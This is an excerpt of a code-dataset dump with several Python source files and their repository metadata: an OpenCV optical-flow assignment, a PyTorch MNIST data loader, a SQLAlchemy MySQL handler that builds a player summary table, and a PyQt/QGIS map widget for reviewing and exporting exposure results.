errors = cv2.calcOpticalFlowPyrLK(prev_gray_frame, gray_frame, prev_pts, None, winSize=(15, 15),\n maxLevel=5, criteria=(cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_COUNT, 10, 0.03)) # Tracking 이 종료되는 지점 설정\n good_pts = pts[status == 1]\n if tracks is None:\n tracks = good_pts\n else:\n tracks = np.vstack((tracks, good_pts))\n for p in tracks:\n cv2.circle(frame, (p[0], p[1]), 3, (0, 255, 0), -1)\n else:\n pts = cv2.goodFeaturesToTrack(gray_frame, 500, 0.05, 10)\n pts = pts.reshape(-1, 1, 2)\n\n idx += 1\n\n prev_pts = pts\n prev_gray_frame = gray_frame\n\n cv2.imshow('Pyramid Lucas-Kanade', frame)\n key = cv2.waitKey() & 0xff\n if key == 27:\n break\n if key == ord('c'):\n tracks = None\n prev_pts = None\n idx = 0\n\ncv2.destroyAllWindows()\n\n\ndef display_flow(img, flow, stride=50):\n for index in np.ndindex(flow[::stride, ::stride].shape[:2]):\n pt1 = tuple(i*stride for i in index)\n delta = flow[pt1].astype (np. 
int32)[::-1]\n pt2 = tuple(pt1 + 10*delta)\n if 2 <= cv2.norm(delta) <= 10:\n cv2.arrowedLine(img, pt1[::-1], pt2[::-1], (0, 0, 255), 2, cv2.LINE_AA, 0, 0.2)\n\n\nprev = None\ncount = 0\n\nwhile True:\n if len(img_list) - 1 < count:\n count = 0\n\n frame = img_list[count].copy()\n\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n if prev is None:\n prev = gray\n else:\n flow = cv2.calcOpticalFlowFarneback(prev, gray, flow=None,\n pyr_scale=0.7, levels=3, winsize=50, iterations=3,\n poly_n=5, poly_sigma=1.1,\n flags=cv2.OPTFLOW_FARNEBACK_GAUSSIAN)\n display_flow(frame, flow)\n prev = gray\n\n cv2.imshow('Gunner Farneback', frame)\n count += 1\n key = cv2.waitKey() & 0xFF\n if key == 27:\n break\n if key == ord('c'):\n break\n\ncv2.destroyAllWindows()\n\n\nprev_frame = cv2.cvtColor(img_list[0], cv2.COLOR_BGR2GRAY)\nflow_DualTVL1 = cv2.createOptFlow_DualTVL1()\ncount = 0\n\nwhile True:\n if len(img_list) - 1 < count:\n count = 0\n\n frame = img_list[count].copy()\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n if not flow_DualTVL1.getUseInitialFlow():\n opt_flow = flow_DualTVL1.calc(prev_frame, gray, None)\n flow_DualTVL1.setUseInitialFlow(True)\n else:\n opt_flow = flow_DualTVL1.calc(prev_frame, gray, opt_flow)\n\n display_flow(frame, opt_flow)\n\n cv2.imshow('Dual TVL1', frame)\n prev_frame = gray.copy()\n count += 1\n key = cv2.waitKey() & 0xFF\n if key == 27:\n break\n if key == ord('c'):\n break\n\ncv2.destroyAllWindows()\n","repo_name":"dgyoo-AI/Industrial-AI","sub_path":"Programming/산업컴퓨터비전실제/13주차/프로그래밍과제#4.py","file_name":"프로그래밍과제#4.py","file_ext":"py","file_size_in_byte":3352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29626953016","text":"import numpy as np # Data processing\nimport pandas as pd # Data processing, CSV file I/O (e.g. pd.read_csv)\nfrom torch.utils.data import Dataset # Data loading\nfrom torch.utils.data.sampler import SubsetRandomSampler # Data preprocessing\n\ntrain_set = pd.read_csv('digit-recognizer/train.csv') # Load training data\ntest_set = pd.read_csv('digit-recognizer/test.csv') # Load testing data\n\nVALID_SIZE = 0.1 # The proportion of data used for the validation split\n\nnum_train = len(train_set) # The number of training samples, 42000\nindices = list(range(num_train)) # Generate a list of indices from 0-41999\nnp.random.shuffle(indices) # Shuffle the indices randomly\nsplit = int(np.floor(VALID_SIZE * num_train)) # Number of validation samples, 4200\ntrain_indices, valid_indices = indices[split:], indices[:split] # Split off the validation set\n\ntrain_sampler = SubsetRandomSampler(train_indices)\nvalid_sampler = SubsetRandomSampler(valid_indices)\n\nprint(f'training set length: {len(train_indices)}') # 37800\nprint(f'validation set length: {len(valid_indices)}') # 4200\n\n\nclass DatasetMNIST(Dataset):\n def __init__(self, data, transform=None, labeled=True):\n self.data = data\n self.transform = transform\n self.labeled = labeled\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, index): # override to define how samples are loaded\n item = self.data.iloc[index]\n if self.labeled: # handle labeled data\n x = item[1:].values.astype(np.uint8).reshape((28, 28)) # image pixel data\n y = item[0] # the label digit\n else: # handle unlabeled data (no label column, so dimensions differ; handled separately here)\n x = item[0:].values.astype(np.uint8).reshape((28, 28)) # image pixel data\n y = 0 # placeholder only; the value is never used and does not affect behavior\n\n if self.transform is not None:\n x = self.transform(x)\n\n return x, 
y\n","repo_name":"sccdog/Digit-recognizer","sub_path":"2_PytorchCNN/Dataloader.py","file_name":"Dataloader.py","file_ext":"py","file_size_in_byte":2037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40833535964","text":"import time\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom models import Summary, IDMappingManual\nfrom collections import namedtuple\n\n\nclass DBHandler(object):\n def __init__(self):\n self.engine = create_engine('mysql+mysqlconnector://lolhfdev2:lolhfdev2@localhost:3306/lolhfdev2')\n self.DBSession = sessionmaker(bind=self.engine)\n\n def initial_table(self, table_model):\n session = self.DBSession()\n session.query(table_model).delete()\n session.commit()\n session.close()\n\n def save_data(self, data_list, table_model):\n self.initial_table(table_model)\n all_data = [table_model(**data) for data in data_list]\n # for item in all_data:\n # print(item.player_name, '=>', item.game_id)\n try:\n session = self.DBSession()\n session.add_all(all_data)\n # session.bulk_save_objects(all_data)\n session.commit()\n session.close()\n except Exception as e:\n print(e)\n # for item in all_data:\n # try:\n # session = self.DBSession()\n # session.add(item)\n # session.commit()\n # session.close()\n # except Exception as e:\n # print(e)\n\n def get_idmappingmanual_gameid(self):\n session = self.DBSession()\n gameids = session.query(IDMappingManual.game_id).filter(IDMappingManual.enable == 1).all()\n tmplist = []\n for gameid in gameids:\n tmplist.append(gameid[0])\n session.close()\n return tmplist\n\n def update_summary(self):\n self.initial_table(Summary)\n time.sleep(10)\n session = self.DBSession()\n sql = '''\n insert into summary\n select distinct\n COALESCE(c.player_name,'路人') as 'player_name'\n ,COALESCE(c.player_country,'unknown') as 'player_country'\n ,COALESCE(c.player_team_short_name,'路人') as 'player_team_short_name'\n ,COALESCE(c.player_team_league,'路人') as 'player_team_league'\n ,COALESCE(c.player_place,'路人') as 'player_place'\n ,a.*\n from gameidinfo a\n left JOIN\n (\n select game_id,player_name\n from idmapping\n where game_id not in\n (select game_id from idmappingmanual)\n UNION\n select game_id,player_name\n from idmappingmanual\n ) b\n on a.game_id=b.game_id\n left join\n (\n select *\n from player\n where player_name not in (select player_name from player group by player_name having count(*)>1)\n and player_name not in (select player_name from playermanual)\n UNION\n select * from playermanual\n ) c\n ON b.player_name=c.player_name\n '''\n session.execute(sql)\n session.commit()\n sql = '''update summary set player_team_short_name='' WHERE player_team_short_name='路人';'''\n session.execute(sql)\n session.commit()\n sql = '''update summary set player_country='' where player_country='unknown';'''\n session.execute(sql)\n session.commit()\n print('update summary')\n session.close()\n","repo_name":"MrShepherd/lolhf2","sub_path":"dbhandler.py","file_name":"dbhandler.py","file_ext":"py","file_size_in_byte":3274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2105656991","text":"# Copyright (c) 2011-2013, ImageCat Inc.\n#\n# This program is free software: you can redistribute it and/or modify \n# it under the terms of the GNU Affero General Public License as published by \n# the Free Software Foundation, either version 3 of the License, or \n# (at your option) any later version.\n#\n# This program is 
distributed in the hope that it will be useful, \n# but WITHOUT ANY WARRANTY; without even the implied warranty of \n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the \n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License \n# along with this program. If not, see .\r\n#\n\"\"\"\r\nWidget (Panel) for result review\r\n\"\"\"\r\nfrom os.path import exists \r\n\r\nfrom PyQt4.QtGui import QWidget, QFileDialog, QDialog, QDialogButtonBox\r\nfrom PyQt4.QtCore import Qt, QObject, QPoint, QRect, pyqtSlot\r\nfrom PyQt4.QtXml import QDomDocument\r\nfrom qgis.gui import QgsMapCanvas, QgsMapCanvasLayer, \\\r\n QgsMapToolPan, QgsMapToolZoom, QgsMapToolEmitPoint, \\\r\n QgsRendererV2PropertiesDialog\r\nfrom qgis.core import QGis, QgsMapLayerRegistry, QgsCoordinateReferenceSystem, \\\r\n QgsCoordinateTransform, QgsFeature, QgsRectangle, QgsPoint, \\\r\n QgsStyleV2, QgsFeatureRendererV2\r\n\r\nfrom utils.shapefile import load_shapefile, layer_field_index, layer_features\r\nfrom sidd.constants import ExportTypes, ExtrapolateOptions\r\n\r\nfrom ui.constants import logUICall, get_ui_string, UI_PADDING\r\nfrom ui.dlg_result import DialogResult\r\nfrom ui.qt.wdg_result_ui import Ui_widgetResult\r\nfrom ui.dlg_search_feature import DialogSearchFeature\r\n\r\nclass WidgetResult(Ui_widgetResult, QWidget):\r\n \"\"\"\r\n Widget (Panel) for result review\r\n \"\"\"\r\n \r\n ''' buffer around clicked point for point in polygon query ''' \r\n SEARCH_BUFFER = 20.0\r\n ''' supported export formats '''\r\n EXPORT_FORMATS = {\r\n get_ui_string(\"app.extension.shapefile\"):ExportTypes.Shapefile,\r\n #get_ui_string(\"app.extension.kml\"):ExportTypes.KML,\r\n #get_ui_string(\"app.extension.nrml\"):ExportTypes.NRML,\r\n get_ui_string(\"app.extension.csv\"):ExportTypes.CSV,\r\n };\r\n ''' enumeration of Layer to be previewed '''\r\n EXPOSURE, SURVEY, POP_GRID, FOOTPRINT, ZONES = range(5);\r\n ''' name for Layer to be previewed '''\r\n LAYER_NAMES = [\r\n get_ui_string(\"widget.result.layer.exposure\"), \r\n get_ui_string(\"widget.result.layer.survey\"),\r\n get_ui_string(\"widget.result.layer.popgrid\"),\n get_ui_string(\"widget.result.layer.footprint\"), \r\n get_ui_string(\"widget.result.layer.zones\"),\n ]; \r\n LAYER_STYLES = [\r\n '',\r\n '',\r\n '',\n '',\r\n '',\n ]\r\n \r\n # constructor / destructor\r\n ###############################\r\n \r\n def __init__(self, app):\r\n \"\"\"\n constructor\n - initialize UI elements\n - connect UI elements to callback \n \"\"\"\n super(WidgetResult, self).__init__()\r\n self.ui = Ui_widgetResult()\r\n self.ui.setupUi(self)\r\n \r\n # create canvas\r\n self.canvas = QgsMapCanvas(self.ui.widget_map)\r\n self.canvas.setGeometry(\r\n 0, # x\r\n self.ui.widget_map_menu_l.x()+self.ui.widget_map_menu_l.height(), # y \r\n self.ui.widget_map.width() - 2*UI_PADDING, # width\r\n self.ui.widget_map.width() - 2*UI_PADDING # height\r\n )\n \r\n self.canvas.setCanvasColor(Qt.white)\r\n self.canvas.enableAntiAliasing(True)\r\n self.canvas.mapRenderer().setProjectionsEnabled(True)\r\n self.canvas.mapRenderer().setDestinationCrs(QgsCoordinateReferenceSystem(4326, QgsCoordinateReferenceSystem.PostgisCrsId))\n self.canvas.zoomNextStatusChanged.connect(self.checkRendering)\r\n self.canvas.xyCoordinates.connect(self.currentLocation)\n self.registry = QgsMapLayerRegistry.instance()\n \n self.map_layers = [None] * len(self.LAYER_NAMES)\r\n self.map_layer_renderer = [None] * len(self.LAYER_NAMES)\r\n for idx, 
str_style in enumerate(self.LAYER_STYLES):\r\n rdoc = QDomDocument(\"renderer\")\r\n rdoc.setContent(str_style) \r\n self.map_layer_renderer[idx] = QgsFeatureRendererV2.load(rdoc.firstChild().toElement())\r\n\r\n # populate export list\r\n self.ui.cb_export_format.clear()\r\n for export_format in self.EXPORT_FORMATS.keys():\r\n self.ui.cb_export_format.addItem(export_format)\r\n \r\n # style object required for QgsRendererV2PropertiesDialog\r\n self.style = QgsStyleV2()\r\n \r\n # create the map tools\r\n self.toolPan = QgsMapToolPan(self.canvas)\r\n self.toolZoomIn = QgsMapToolZoom(self.canvas, False) # false = in\r\n self.toolZoomOut = QgsMapToolZoom(self.canvas, True) # true = out\r\n self.toolInfo = QgsMapToolEmitPoint(self.canvas)\r\n self.toolInfo.canvasClicked.connect(self.showInfo)\r\n self.canvas.setMapTool(self.toolPan)\r\n \r\n # additional \r\n self.dlgResultDetail = DialogResult()\r\n self.dlgResultDetail.setModal(True)\r\n\r\n # set link to application main controller\r\n self.app = app\r\n \r\n # reset project\r\n self._project = None\r\n \r\n # default export setting\r\n self.export_format = ExportTypes.Shapefile\r\n \r\n # connect slots (ui event)\r\n self.ui.btn_zoom_full.clicked.connect(self.mapZoomFull)\r\n self.ui.btn_zoom_in.clicked.connect(self.mapZoomIn)\r\n self.ui.btn_zoom_out.clicked.connect(self.mapZoomOut)\n self.ui.btn_stop.clicked.connect(self.stopRendering)\r\n self.ui.btn_zoom_layer.clicked.connect(self.mapZoomLayer) \r\n self.ui.btn_pan.clicked.connect(self.mapPan)\r\n self.ui.btn_theme.clicked.connect(self.mapEditTheme)\r\n self.ui.btn_info.clicked.connect(self.mapIdentify)\n \n self.ui.btn_zoom_to_feature.clicked.connect(self.searchFeature)\r\n \r\n self.ui.cb_export_format.currentIndexChanged[str].connect(self.exportFormatChanged)\r\n self.ui.btn_export.clicked.connect(self.exportData)\r\n self.ui.btn_export_select_path.clicked.connect(self.selectExportFile)\r\n\n @pyqtSlot(QgsPoint)\n def currentLocation(self, point):\n self.app.updateMapLocation(point.x(),point.y())\n #self.canvas.mouseMoveEvent(mouseEvent)\n \n\r\n # UI event handling calls (Qt slots)\r\n ###############################\r\n @pyqtSlot(QObject)\r\n def resizeEvent(self, event):\r\n \"\"\" handle window resize \"\"\" \r\n # find left coordinate for right side panels\r\n x_right_side = self.width()-self.ui.widget_export.width()-UI_PADDING\r\n # adjust right side panels\r\n self.ui.widget_export.move(x_right_side, self.ui.widget_map.y()+30)\r\n self.ui.widget_dq_test.move(x_right_side, self.ui.widget_export.y()+self.ui.widget_export.height()+UI_PADDING)\r\n # adjust map panel (left side) \r\n self.ui.widget_map.resize(x_right_side-UI_PADDING, self.height()-2*UI_PADDING)\r\n # adjust map canvas within the map panel \r\n map_top = self.ui.widget_map_menu_l.x()+self.ui.widget_map_menu_l.height()+UI_PADDING \r\n self.canvas.resize(\r\n x_right_side-UI_PADDING, # same width as self.ui.widget_map\r\n self.ui.widget_map.height()-map_top-2*UI_PADDING) # height \r\n # adjust map menu\r\n self.ui.widget_map_menu_r.move(\r\n self.ui.widget_map.width()-self.ui.widget_map_menu_r.width(), # right align with map panel \r\n 0)\r\n # logo\n self.ui.lb_gem_logo.move(self.width()-self.ui.lb_gem_logo.width(), self.ui.lb_gem_logo.y())\n\r\n @logUICall\r\n @pyqtSlot()\r\n def mapPan(self):\r\n \"\"\" event handler for btn_pan - pan map \"\"\"\r\n self.canvas.unsetMapTool(self.toolInfo)\r\n self.canvas.setMapTool(self.toolPan)\n\r\n @logUICall\r\n @pyqtSlot()\r\n def mapZoomIn(self):\r\n \"\"\" event handler 
 for btn_zoom_in - zoom in on map \"\"\"\r\n self.canvas.unsetMapTool(self.toolInfo)\r\n self.canvas.setMapTool(self.toolZoomIn)\n\n @logUICall\r\n @pyqtSlot()\r\n def mapZoomOut(self):\r\n \"\"\" event handler for btn_zoom_out - zoom out on map \"\"\"\r\n self.canvas.unsetMapTool(self.toolInfo)\r\n self.canvas.setMapTool(self.toolZoomOut)\n\n @logUICall\r\n @pyqtSlot()\r\n def mapZoomFull(self):\r\n \"\"\" event handler for btn_zoom_full - zoom to full map \"\"\"\r\n self.canvas.zoomToFullExtent()\n\n def checkRendering(self, changed):\n self.canvas.setRenderFlag(True)\n \n @logUICall\n @pyqtSlot()\n def stopRendering(self): \n self.canvas.setRenderFlag(False)\n\r\n @logUICall\r\n @pyqtSlot()\r\n def mapZoomLayer(self):\r\n self.canvas.unsetMapTool(self.toolInfo)\r\n cur_layer_name = self.ui.cb_layer_selector.currentText()\n if cur_layer_name.isEmpty():\n return\r\n self.zoomToLayer(self.map_layers[self.LAYER_NAMES.index(cur_layer_name)])\r\n \r\n @logUICall\r\n @pyqtSlot()\r\n def mapEditTheme(self):\r\n \"\"\" event handler for btn_theme - edit the rendering theme of the selected layer \"\"\"\n cur_layer_name = self.ui.cb_layer_selector.currentText()\n if cur_layer_name.isEmpty():\n return\r\n try:\r\n cur_layer_idx = self.LAYER_NAMES.index(cur_layer_name)\n \n # build layer render property Dialog for selected layer \r\n dlg_render = QDialog()\n dlg_render.setWindowTitle(get_ui_string('widget.result.renderer.settings'))\n dlg_render.setModal(True)\n dlg_render.setFixedSize(530, 370)\n dlg_render.renderer = QgsRendererV2PropertiesDialog(self.map_layers[cur_layer_idx], self.style, True)\n dlg_render.renderer.setParent(dlg_render) \n dlg_render.renderer.setGeometry(QRect(10, 10, 510, 325))\n dlg_render.buttonBox = QDialogButtonBox(dlg_render)\n dlg_render.buttonBox.setGeometry(QRect(10, 335, 510, 25))\n dlg_render.buttonBox.setStandardButtons(QDialogButtonBox.Cancel|QDialogButtonBox.Ok)\n dlg_render.buttonBox.accepted.connect(dlg_render.accept)\n dlg_render.buttonBox.accepted.connect(dlg_render.renderer.onOK)\n dlg_render.buttonBox.rejected.connect(dlg_render.reject)\n dlg_render.setVisible(True)\n\n # get user input and update renderer\r\n answer = dlg_render.exec_()\r\n if answer == QDialog.Accepted:\r\n self.map_layer_renderer[cur_layer_idx] = None\r\n self.map_layer_renderer[cur_layer_idx] = self.map_layers[cur_layer_idx].rendererV2().clone() \r\n self.canvas.refresh()\r\n dlg_render.destroy()\r\n del dlg_render\r\n except Exception as err:\n # theming is non-critical, allow continue on exception\r\n logUICall.log(str(err), logUICall.WARNING)\r\n\r\n @logUICall\r\n @pyqtSlot()\r\n def searchFeature(self): \r\n cur_layer_name = self.ui.cb_layer_selector.currentText()\n if cur_layer_name.isEmpty():\n return\r\n try:\r\n cur_layer_idx = self.LAYER_NAMES.index(cur_layer_name) \r\n layer = self.map_layers[cur_layer_idx]\r\n fields = []\r\n for fidx in layer.dataProvider().fields():\r\n fields.append(layer.dataProvider().fields()[fidx].name())\r\n dlg_search = DialogSearchFeature(fields) \r\n answer = dlg_search.exec_()\r\n if answer == QDialog.Accepted:\r\n extent = self.findFeatureExtentByAttribute(layer, dlg_search.attribute, dlg_search.value)\r\n if extent is not None:\r\n self.zoomToExtent(extent)\r\n else:\r\n logUICall.log(get_ui_string(\"widget.result.info.notfound\"), logUICall.WARNING)\r\n dlg_search.destroy()\r\n except Exception as err:\r\n # feature search is non-critical, allow continue on exception\n logUICall.log(str(err), logUICall.WARNING)\r\n \r\n @logUICall\r\n @pyqtSlot()\r\n def mapIdentify(self):\r\n 
\"\"\" \r\n event handler for btn_info \r\n This only enables map querying, method connected to canvasClicked signal does\r\n the actual point-polygon query \r\n \"\"\"\n self.canvas.setMapTool(self.toolInfo)\r\n\r\n @logUICall\r\n @pyqtSlot()\r\n def selectExportFile(self):\r\n \"\"\"\r\n event handler for btn_export_select_path \r\n - open save file dialog box to select file name for export \r\n \"\"\"\r filename = QFileDialog.getSaveFileName(self,\r\n get_ui_string(\"widget.result.export.file.open\"),\r\n \".\", \r\n self.ui.cb_export_format.currentText())\r\n if not filename.isNull():\r\n self.ui.txt_export_select_path.setText(filename) \r\n \r\n @logUICall\r\n @pyqtSlot(str)\r\n def exportFormatChanged(self, selected_val):\r\n \"\"\"\r\n event handler for cb_export_format \r\n - update selected file after format change\r\n \"\"\"\n self.ui.txt_export_select_path.setText(\"\")\r\n self.export_format = self.EXPORT_FORMATS[str(selected_val)]\r\n \r\n @logUICall\r\n @pyqtSlot()\r\n def exportData(self):\r\n \"\"\" \r\n event handler for btn_export\r\n - do export data \r\n \"\"\"\r\n export_path = str(self.ui.txt_export_select_path.text())\r\n if export_path == \"\":\r\n logUICall.log(get_ui_string(\"app.error.path.is.null\"), logUICall.WARNING)\r\n return\r\n self.app.exportResults(self.export_format, export_path)\r\n\r\n \r\n @logUICall\r\n @pyqtSlot(QPoint, QObject)\r\n def showInfo(self, point, mouseButton):\r\n \"\"\"\r\n event handler for toolInfo\r\n @see QGIS tutorial for detail\r\n point-polygon search on currently selected layer \r\n \"\"\"\r\n cur_layer_name = self.ui.cb_layer_selector.currentText()\n if cur_layer_name.isEmpty():\n return\r\n try:\r\n cur_layer_idx = self.LAYER_NAMES.index(cur_layer_name)\r\n cur_layer = self.map_layers[cur_layer_idx]\r\n \r\n # if layer is not in same projection as map canvas\r\n # need to project query point\r\n if cur_layer.crs() != self.canvas.mapRenderer().destinationCrs():\r\n transform = QgsCoordinateTransform(self.canvas.mapRenderer().destinationCrs(), cur_layer.crs())\r\n point = transform.transform(point)\r\n \r\n # do query\r\n provider = cur_layer.dataProvider() \r\n provider.rewind()\r\n feature = QgsFeature()\r\n colonIndexes = provider.attributeIndexes()\r\n \r\n # search using point as center of rectangle polygon\r\n search_buffer_x = self.canvas.extent().width() * self.SEARCH_BUFFER / self.canvas.width()\r\n search_buffer_y = self.canvas.extent().height() * self.SEARCH_BUFFER / self.canvas.height()\r\n provider.select(colonIndexes,\r\n QgsRectangle(point.x()-search_buffer_x,\r\n point.y()-search_buffer_y,\r\n point.x()+search_buffer_x,\r\n point.y()+search_buffer_y),\r\n True)\r\n # get selected and display in result detail dialog box \r\n selected = [] \r\n while provider.nextFeature(feature): \r\n # for polygons, only show geometry containing query point \r\n if cur_layer.geometryType() == QGis.Polygon: \r\n if feature.geometry() is not None and not feature.geometry().contains (point):\r\n continue\r\n selected.append(feature.attributeMap())\r\n\r\n if len(selected)>0:\r\n # display result if exists\r\n if cur_layer_idx == self.EXPOSURE:\r\n self.dlgResultDetail.showExposureData(provider.fields(), selected) \r\n else:\r\n self.dlgResultDetail.showInfoData(provider.fields(), selected)\r\n self.dlgResultDetail.exec_()\r\n else:\r\n logUICall.log(get_ui_string(\"widget.result.info.notfound\"), logUICall.WARNING)\r\n except Exception as err:\r\n # point-in-polygon search is not critical, continue on error \n 
logUICall.log(str(err), logUICall.WARNING)\r\n \r\n # public methods\r\n ###############################\r\n def set_project(self, project):\r\n ''' set project to preview. force refresh view on set''' \r\n self._project = project\r\n if project is None:\r\n return\n self.refreshView()\n self.canvas.zoomToFullExtent()\n logUICall.log(\"Project preview initialized successfully\", logUICall.INFO)\r\n \r\n def get_project(self):\r\n return self._project\r\n \r\n # property access to project\r\n project = property(get_project, set_project)\r\n \r\n def refreshView(self):\n ''' reload all QGIS layers in currently defined project '''\r\n if self._project is None:\r\n return\n \n # display layers if they exist \r\n if self._project.fp_file is not None and exists(self._project.fp_file):\r\n if self.map_layers[self.FOOTPRINT] is None or self.map_layers[self.FOOTPRINT].source() != self._project.fp_file: \r\n self.showDataLayer(self.FOOTPRINT, load_shapefile(self._project.fp_file, 'footprint'))\r\n else: \r\n self.removeDataLayer(self.FOOTPRINT)\r\n \r\n if self._project.zone_file is not None and exists(self._project.zone_file):\r\n if self.map_layers[self.ZONES] is None or self.map_layers[self.ZONES].source() != self._project.zone_file:\r\n self.showDataLayer(self.ZONES, load_shapefile(self._project.zone_file, 'zones'))\r\n else: \r\n self.removeDataLayer(self.ZONES)\r\n \r\n if self._project.survey_file is not None and exists(self._project.survey_file):\r\n if getattr(self._project, 'survey', None) is None:\r\n self._project.load_survey()\r\n self.showDataLayer(self.SURVEY, self._project.survey)\r\n else: \r\n self.removeDataLayer(self.SURVEY)\r\n \n if self._project.popgrid_file is not None and exists(self._project.popgrid_file):\n if getattr(self._project, 'popgrid', None) is None:\n self.showDataLayer(self.POP_GRID, load_shapefile(self._project.popgrid_file, 'popgrid'))\n else: \n self.removeDataLayer(self.POP_GRID)\n \r\n # set export options\r\n for idx, export_format in enumerate(self.EXPORT_FORMATS.values()):\r\n if export_format == self._project.export_type:\r\n self.ui.cb_export_format.setCurrentIndex(idx)\r\n self.ui.txt_export_select_path.setText(self._project.export_path)\n \n # refreshResult contains refresh call to update all layers currently loaded\r\n self.refreshResult()\r\n\r\n def refreshResult(self):\n ''' reload result QGIS layer and data quality reports in currently defined project '''\r\n exposure = getattr(self._project, 'exposure', None) \n if exposure is not None:\r\n self.showDataLayer(self.EXPOSURE, exposure)\r\n has_result = True \r\n else:\r\n self.removeDataLayer(self.EXPOSURE)\r\n has_result = False\r\n \r\n if has_result:\r\n # build quality report \r\n report_lines = []\r\n if self._project.operator_options.has_key(\"proc.extrapolation\"):\r\n proc_option = self._project.operator_options[\"proc.extrapolation\"]\r\n if proc_option == ExtrapolateOptions.RandomWalk:\r\n proc_method = get_ui_string(\"widget.result.dq.method\", get_ui_string(\"dlg.options.ep.random\"))\r\n elif proc_option == ExtrapolateOptions.Fraction:\r\n proc_method = get_ui_string(\"widget.result.dq.method\", get_ui_string(\"dlg.options.ep.fraction\"))\r\n elif proc_option == ExtrapolateOptions.FractionRounded:\r\n proc_method = get_ui_string(\"widget.result.dq.method\", get_ui_string(\"dlg.options.ep.fraction.rounded\"))\r\n else:\r\n proc_method = get_ui_string(\"widget.result.dq.method\", get_ui_string(\"dlg.options.ep.random\")) \r\n report_lines.append(proc_method)\r\n report_lines.append('')\r\n 
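# the strings collected in report_lines are joined with newlines below to populate the data-quality details panel\r\n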
\r\n # total tests\r\n report_lines.append(get_ui_string('widget.result.dq.total_tests', len(self._project.quality_reports.keys())))\r\n report_lines.append('')\r\n \r\n # detail for each test\r\n for key, report in self._project.quality_reports.iteritems():\r\n report_lines.append(get_ui_string('widget.result.dq.tests.%s' % key)) \r\n for title, value in report.iteritems():\r\n report_lines.append( get_ui_string('widget.result.dq.tests.%s.%s' % (key, title), value) )\r\n report_lines.append('') \r\n self.ui.txt_dq_test_details.setText(\"\\n\".join(report_lines))\r\n\r\n\r\n self.ui.btn_export.setEnabled(has_result)\r\n self.ui.widget_dq_test.setVisible(has_result)\r\n self.ui.txt_export_select_path.setEnabled(has_result)\r\n self.ui.btn_export_select_path.setEnabled(has_result)\r\n self.ui.cb_export_format.setEnabled(has_result) \r\n\n # this call refreshes all layers currently loaded \n self.refreshLayers() \n\r\n @logUICall\r\n def closeResult(self):\n ''' remove the result QGIS layer from the map and reset the quality report display '''\r\n self.canvas.setLayerSet([]) # call necessary to remove all layers to avoid disconnect errors \n self.removeDataLayer(self.EXPOSURE)\n self.refreshLayers()\n self.ui.txt_dq_test_details.setText(\"\")\n \r\n @logUICall\r\n def closeAll(self):\n ''' remove all QGIS layers of the currently defined project from the map '''\r\n self.ui.cb_layer_selector.clear()\r\n try:\n self.canvas.setLayerSet([]) # call necessary to remove all layers to avoid disconnect errors \r\n for i in range(5):\r\n self.removeDataLayer(i) \n self.ui.txt_dq_test_details.setText(\"\")\n self.refreshLayers()\r\n except: \r\n pass # an exception is thrown when the registry is empty\r\n \r\n # internal helper methods\r\n ###############################\r\n def showDataLayer(self, index, layer):\r\n \"\"\" display given QGIS layer on map \"\"\"\r\n try:\r\n # add to QGIS registry and refresh view\n if self.map_layers[index] is not None:\n self.removeDataLayer(index)\n self.map_layers[index] = layer\n self.registry.addMapLayer(layer)\n layer.setRendererV2(self.map_layer_renderer[index]) \n except:\r\n pass\r\n\r\n def removeDataLayer(self, index):\n \"\"\" remove from map the layer identified with index \"\"\"\r\n layer = self.map_layers[index]\r\n self.map_layers[index] = None \r\n if layer is not None: \r\n try:\r\n self.registry.removeMapLayer(layer.getLayerID(), False)\n del layer \r\n except:\r\n pass # do nothing if it fails. 
probably already deleted\r\n\r\n def findFeatureExtentByAttribute(self, layer, field, value):\n \"\"\" \n find extent of all objects in QGIS layer matching condition \"field=value\" \n \"\"\"\r\n fidx = layer_field_index(layer, field)\r\n if fidx == -1:\r\n return None\r\n xmin, xmax, ymin, ymax = 180, -180, 90, -90\r\n extent = QgsRectangle(xmin, ymin, xmax, ymax)\r\n need_transform = layer.crs() != self.canvas.mapRenderer().destinationCrs()\r\n if need_transform:\r\n transform = QgsCoordinateTransform(layer.crs(), self.canvas.mapRenderer().destinationCrs())\r\n for feature in layer_features(layer):\r\n if str(value) == feature.attributeMap()[fidx].toString():\r\n f_extent = feature.geometry().boundingBox()\r\n if need_transform:\r\n f_extent = transform.transform(f_extent)\r\n xmin = min(f_extent.xMinimum(), xmin)\r\n xmax = max(f_extent.xMaximum(), xmax)\r\n ymin = min(f_extent.yMinimum(), ymin)\r\n ymax = max(f_extent.yMaximum(), ymax)\r\n extent.set (xmin, ymin, xmax, ymax)\r\n return extent\r\n\r\n def zoomToLayer(self, layer):\r\n \"\"\" zoom canvas to extent of given layer \"\"\"\r\n try:\r\n lyr_extent = layer.extent() \r\n if layer.crs() != self.canvas.mapRenderer().destinationCrs():\r\n transform = QgsCoordinateTransform(layer.crs(), self.canvas.mapRenderer().destinationCrs())\r\n lyr_extent = transform.transform(lyr_extent)\r\n self.zoomToExtent(lyr_extent)\r\n except:\r\n pass\r\n \r\n def zoomToExtent(self, extent):\n \"\"\" zoom canvas to given extent \"\"\"\r\n try:\r\n self.canvas.setExtent(extent)\r\n self.canvas.zoomByFactor(1.1)\n except:\r\n self.mapZoomFull()\r\n \r\n def refreshLayers(self):\r\n \"\"\" refresh all layers in canvas \"\"\"\r\n # add each layer according to order\r\n layerSet = []\n self.ui.cb_layer_selector.clear()\r\n for idx, lyr in enumerate(self.map_layers):\r\n if lyr is not None:\r\n layerSet.append(QgsMapCanvasLayer(lyr))\r\n self.ui.cb_layer_selector.addItem(self.LAYER_NAMES[idx])\n if len(layerSet) > 0: \r\n self.canvas.setLayerSet(layerSet)\n 